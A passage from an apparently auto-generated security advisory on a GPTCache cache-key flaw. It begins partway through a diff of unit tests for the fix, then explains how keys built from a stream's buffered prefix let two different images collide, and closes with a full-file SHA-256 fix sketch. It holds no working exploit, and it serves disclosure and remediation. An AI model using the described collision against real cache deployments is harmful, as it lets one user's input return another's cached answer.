+ key_a = get_input_str({"input": {"image": _make_stream(b"\xAA" * 4096), "question": question}}) + key_b = get_input_str({"input": {"image": _make_stream(b"\xAA" * 4096), "question": question}}) + assert key_a == key_b + + +def test_get_input_str_different_question(): + stream_data = b"\xAA" * 4096 + key_a = get_input_str({"input": {"image": _make_stream(stream_data), "question": "Q1"}}) + key_b = get_input_str({"input": {"image": _make_stream(stream_data), "question": "Q2"}}) + assert key_a != key_b + + +def test_get_input_str_resets_pointer(): + stream = _make_stream(b"\xAA" * 4096) + get_input_str({"input": {"image": stream, "question": "test"}}) + assert stream.tell() == 0 + + +def test_get_image_question_no_collision(): + question = "What is this?" + key_a = get_image_question({"image": _make_stream(b"\xAA" * 4096), "question": question}) + key_b = get_image_question({"image": _make_stream(b"\xBB" * 4096), "question": question}) + assert key_a != key_b + + +def test_get_image_question_with_filepath(): + """Test get_image_question when image is a file path string.""" + fd, path = tempfile.mkstemp(suffix=".jpg") + try: + os.write(fd, SHARED_HEADER + b"\xCC" * 4096) + os.close(fd) + key = get_image_question({"image": path, "question": "test"}) + assert len(key) > 64 # sha256 hex (64 chars) + question + finally: + os.unlink(path)
Vulnerability mechanics
Root cause
"The pre-processing functions in `gptcache/processor/pre.py` build cache keys from `BufferedReader.peek()`, which returns only the buffered prefix of the `input_data["image"]` (or file) stream rather than its full content, so the key acts as a weak hash."
Attack vector
An attacker with local access can trigger this vulnerability by supplying an `input_data["image"]` argument whose buffered prefix matches that of a different image, so that both inputs map to the same weakly hashed cache key. The CVE record rates the attack complexity as high and exploitation as difficult. An exploit is publicly available.
Affected code
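The vulnerability resides in `gptcache/processor/pre.py`, within the Cache Key Handler component. The patch modifies `get_file_bytes()`, `get_input_str()`, and `get_image_question()`, each of which previously called `BufferedReader.peek()` when building a cache key.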
What the fix does
The pull request [patch_id=4820261] adds a `_hash_file()` helper to `gptcache/processor/pre.py` that computes a SHA-256 hash over the full file content in 65536-byte chunks and then resets the file pointer with `seek(0)`. `get_file_bytes()`, `get_input_str()`, and `get_image_question()` use this hash in place of `peek()`, so the cache key reflects the entire file rather than its buffered prefix.
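The effect of hashing the full content, as in the pre.py diff listed under Patches, can be checked with a short sketch. `hash_stream` below is a hypothetical re-implementation written for illustration (it follows the same read-in-chunks, then `seek(0)` pattern) and is not the project's helper itself.

```python
import hashlib
import io


def hash_stream(f, chunk_size: int = 65536) -> str:
    """Illustrative helper: SHA-256 over the whole stream, then rewind it."""
    digest = hashlib.sha256()
    # iter() with a sentinel keeps reading until read() returns b"".
    for chunk in iter(lambda: f.read(chunk_size), b""):
        digest.update(chunk)
    f.seek(0)  # leave the stream ready for the downstream consumer
    return digest.hexdigest()


prefix = b"\xff\xd8\xff\xe0" + b"\x00" * 8188  # 8192 shared bytes
stream_a = io.BufferedReader(io.BytesIO(prefix + b"\xaa" * 4096))
stream_b = io.BufferedReader(io.BytesIO(prefix + b"\xbb" * 4096))

question = "What is this?"
key_a = hash_stream(stream_a) + question
key_b = hash_stream(stream_b) + question

print("keys equal:", key_a == key_b)
print("position after hashing:", stream_a.tell())
```

Reading in chunks keeps memory use bounded for large files, and rewinding the stream matters because whatever consumes the file after key generation still needs to read it from the start.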
Preconditions
- input: Manipulation of the `input_data["image"]` argument.
- network: The attack must be initiated from a local position.
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.